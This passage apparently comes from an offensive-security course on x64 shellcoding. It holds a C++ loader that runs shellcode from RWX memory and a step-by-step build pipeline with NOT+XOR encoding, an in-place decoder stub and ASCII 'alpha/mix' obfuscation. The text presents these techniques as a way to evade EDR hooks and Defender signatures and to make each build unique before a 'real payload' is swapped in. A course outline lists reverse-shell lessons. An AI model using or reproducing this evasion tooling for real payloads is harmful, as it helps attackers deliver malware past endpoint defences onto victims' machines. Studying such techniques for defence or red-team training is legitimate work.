    void* exec_mem = VirtualAlloc(
        nullptr, shellcode_size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );
    if (!exec_mem) {
        std::cerr << "[-] VirtualAlloc failed\n";
        return -1;
    }

    memcpy(exec_mem, shellcode, shellcode_size);

    // Cast and call — decoder stub runs first, decodes payload, jmps to shellcode
    auto fn = reinterpret_cast<void(*)()>(exec_mem);
    fn();

    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return 0;
}

Normally a linked executable's .text section is marked read+execute but not writable. The decoder writes decoded bytes back to encoded_shellcode, which lives in .text. Without -N, this write triggers an access violation before a single byte is decoded.

-N (also known as --omagic) tells the GNU linker to mark the text segment as writable, giving it read+write+execute permissions. This is only needed for the standalone decoder.exe test — when using the C++ loader, the shellcode lives in a PAGE_EXECUTE_READWRITE VirtualAlloc region which is already writable by definition.

💡 A quick test workflow: compile decoder.asm with nasm + ld -N, run decoder.exe, verify calc appears. Then extract bytes with findhex.py, run alpha_mix.py, paste into loader.cpp, compile and run. Same result — this confirms the full pipeline end to end before you swap in a real payload.
Pure alphanumeric encoding (only A-Za-z0-9 bytes) requires a specialized encoder like ALPHA3 that transforms every byte to fall in that ASCII range — at the cost of roughly 2–3x payload size expansion and an additional alphanumeric decoder stub on top. The alpha/mix approach is simpler and avoids the size penalty: just express each byte as its printable ASCII character if it has one, and leave non-printable bytes as \xNN.

The benefits of alpha/mix for this use case:
- Visually obscures the payload in source code — a mix of Latin characters, symbols, and hex escapes looks far less like shellcode than a dense block of \xNN\xNN\xNN
- No payload size expansion — one byte stays one byte
- Direct C string literal compatibility — the compiler concatenates adjacent tokens automatically
- The three special-case handlers for 0x27, 0x22, and 0x20 prevent C string literal syntax errors that would break compilation
Index 38 is just one of the valid key positions the encoder found. Any index where the encoded output byte equals the XOR key value (0xAC) is a valid choice. The encoder prints all such positions — you pick one and hardcode it as the offset in mov r9b, [rel encoded_shellcode + N].

Choosing a different valid index changes two things simultaneously: the decoder instruction bytes change (different immediate value in the MOV) and the compiler-generated stub bytes are different, giving yet more variability in the final payload signature.

You can also change the XOR key entirely — pick a different key in not_xor_encoder.py, the encoder will produce a completely different encoded payload with different valid index positions, and you update the index in the decoder assembly accordingly. Every combination produces different bytes everywhere in the pipeline.

⚠ After changing the key or index, always recompile and test the decoder standalone before embedding in a loader. A wrong index reads the wrong byte as the key, decodes to garbage, and crashes silently.
The full pipeline from source to deployable shellcode, end to end on Windows:
- calc.asm — TEB-based kernel32 finder + WinExec, NULL-free, bypasses EDR position-based hooks
- not_xor_encoder.py — Bitwise NOT + XOR encoding with self-embedded key at deterministic index
- decoder.asm — x64 stub that reads key from embedded position, XOR+NOT decodes in-place, jmp rax executes
- findhex.py — Windows-native .obj byte extraction, no Linux VM required
- alpha_mix.py — converts binary payload to mixed ASCII/hex C string literal format
- loader.cpp — VirtualAlloc RWX + memcpy + call — runs on fully patched Windows with Defender active
No msfvenom. No Metasploit. No Linux toolchain. Every tool in this pipeline was written from scratch and runs natively on Windows.

Full Pipeline — From .asm to Final Alpha/Mix Shellcode

      Shell
      Complete workflow — calc.asm → encoded → decoder stub → alpha/mix → loader.cpp
    
# ── Stage 1: The payload shellcode ──────────────────────────────────

# Write calc.asm (TEB-walk kernel32 finder + WinExec)

# Compile to .obj
nasm -fwin64 calc.asm -o calc.obj

# Extract raw bytes
python findhex.py calc.obj
#    Output: \x4d\x87\xe6... → paste into not_xor_encoder.py shellcode variable

# Encode with NOT + XOR + embedded key
python not_xor_encoder.py
#    Output: encoded bytes + "Key embedded at position: N"
#    Note the key index — you'll need it for decoder.asm

# ── Stage 2: The decoder stub ────────────────────────────────────────

# Paste encoded bytes into decoder.asm as the encoded_shellcode db block
# Update the key index: mov r9b, [rel encoded_shellcode + N]
# Compile (no -no-pie needed; -N makes .text writable for standalone test)
nasm -fwin64 decoder.asm -o decoder.obj
ld -m i386pep -N -o decoder.exe decoder.obj

# Test standalone: decoder.exe should launch calc.exe — confirms decode works
decoder.exe

# ── Stage 3: Extract + alpha/mix encode ─────────────────────────────

# Extract full payload from decoder.obj (stub + encoded shellcode)
python findhex.py decoder.obj
#    Output: full combined bytes → paste into alpha_mix.py hex_list variable

# Convert to mixed ASCII/hex C string tokens
python alpha_mix.py
#    Output: "H" "\x8d" "5" "#" "\x00" ... → paste into loader.cpp shellcode[]

# ── Stage 4: Final loader ────────────────────────────────────────────

# Paste alpha_mix.py output into loader.cpp shellcode[] array
# Compile and run — decoder stub fires, decodes in-place, calc.exe launches
x86_64-w64-mingw32-g++ -o loader.exe loader.cpp

Both paths reach the PEB, but the standard mov rax, [gs:0x60] shortcut is a well-known and well-monitored access pattern. Some EDR products hook or monitor this specific GS segment offset access to detect shellcode performing PEB walks.

Going through the TEB explicitly — gs:[0x30] for TEB base, then [rax+0x60] for PEB — is architecturally equivalent but takes a different code path. It also mirrors how Windows itself navigates these structures internally, making it harder to distinguish from legitimate code.

💡 In WinDbg: dt nt!_TEB @$teb shows the TEB layout. PebBaseAddress is at offset 0x060. dt nt!_PEB @$peb shows the PEB layout — Ldr is at 0x018.
Windows stores module names as UTF-16LE strings. Each ASCII character becomes a 2-byte WORD: the ASCII value in the low byte, 0x00 in the high byte. Reading "KERN" as four UTF-16LE WORDs:
- K = 0x004B, E = 0x0045, R = 0x0052, N = 0x004E
- In memory (little-endian): 4B 00 45 00 52 00 4E 00
- As a 64-bit little-endian immediate: 0x004E00520045004B
Loading [rcx] (first 8 bytes of the name buffer) into RBX and comparing with this immediate checks all four characters in a single instruction. It's both efficient and NULL-free.

💡 To search for a different DLL: take the first 4 characters of its name, encode each as a WORD (char + 0x00), then build the 8-byte little-endian immediate. For ntdll.dll: N=0x004E T=0x0054 D=0x0044 L=0x004C → 0x004C00440054004E.
Embedding the key at position = xor_key % len(payload) means the key byte position is a function of the key value itself. Change xor_key from 0xAC to 0x7F and two things change simultaneously:
- All encoded bytes change — different XOR key produces completely different output bytes
- The key's position in the output changes — 0x7F % len vs 0xAC % len are almost certainly different offsets
This means a static signature targeting "the key byte is at offset N" is invalidated just by changing the key. The decoder stub computes the position formula itself, so it works for any key without modification.

⚠ Always verify the round-trip after changing the key. Some keys produce bad characters (0x00, 0x20, 0x0A, 0x0D) in the encoded output that will break delivery through string-handling functions. Test with your specific delivery mechanism.
Even when RSP and RBP appear absent from the shellcode's explicit instructions, they always have implicit roles. RSP is the active stack pointer — always in use, always changing with every push/pop/call/ret. Inserting junk that modifies RSP would immediately corrupt the stack and crash execution.

RBP is excluded defensively — even if the shellcode doesn't explicitly use it, the compiler or linker may use frame-pointer conventions that depend on RBP being stable. It's excluded from the candidates list unconditionally:

[r for r in candidates if r not in ['rsp', 'rbp']]

For the calc.asm TEB-walk shellcode, the registers available for junk injection are typically r12, r13, r14 — the non-volatile callee-saved registers not needed in the KERN search or WinExec call chain. The script prints them on stderr when it runs so you can verify.

✓ Module Complete. You now have a full end-to-end shellcode pipeline running natively on Windows — no msfvenom, no Linux VM: TEB-walk kernel32 discovery that bypasses EDR position hooks, Windows-native .obj byte extraction, NOT+XOR encoding with self-embedded key, an x64 decoder stub that decodes in-place and jmps to the payload, and alpha/mix conversion for C string literal delivery. No two builds produce the same bytes.

x64 Assembly &Shellcoding 101

x64 Essentials — Registers, Stack Alignment & Shadow Space

Learning Objectives

Registers — Volatile vs. Non-Volatile

16-Byte Stack Alignment

Shadow Space

Calling Convention — Passing Parameters

PE Structure & Walking the Export Table

Learning Objectives

Why Walk the PE Table?

PEB Walk — Locating kernel32.dll

Export Directory Walk — Resolving WinExec

NULL Byte Elimination

Learning Objectives

Why NULL Bytes Break Shellcode

String Encoding with Bitwise Operations

Learning Objectives

Why Encode Strings in Shellcode?

Dynamic API Resolution with GetProcAddress

Learning Objectives

Beyond kernel32 — Loading Additional DLLs

Reverse Shell — Using Extern APIs

Learning Objectives

The Extern Approach — Learning Before the Deep End

Pure x64 Assembly Reverse Shell

Learning Objectives

The Final Exam

Shellcode Execution & C++ Loaders

Learning Objectives

The Standard Shellcode Loader

Python Shellcode Generator — TEB Walk, Extraction & NOT+XOR Encoding

Learning Objectives

Why a New Kernel32 Walk? — Defeating EDR Hooks

Tool 1 — findhex.py: Windows-Native Shellcode Extraction

Tool 2 — NOT + XOR Encoder with Embedded Key

Tool 3 — The NOT+XOR Decoder in x64 Assembly

Tool 4 — Alpha/Mix Encoding: Converting to ASCII-Printable Shellcode

The Final C++ Loader

Full Pipeline — From .asm to Final Alpha/Mix Shellcode

x64 Assembly &
Shellcoding 101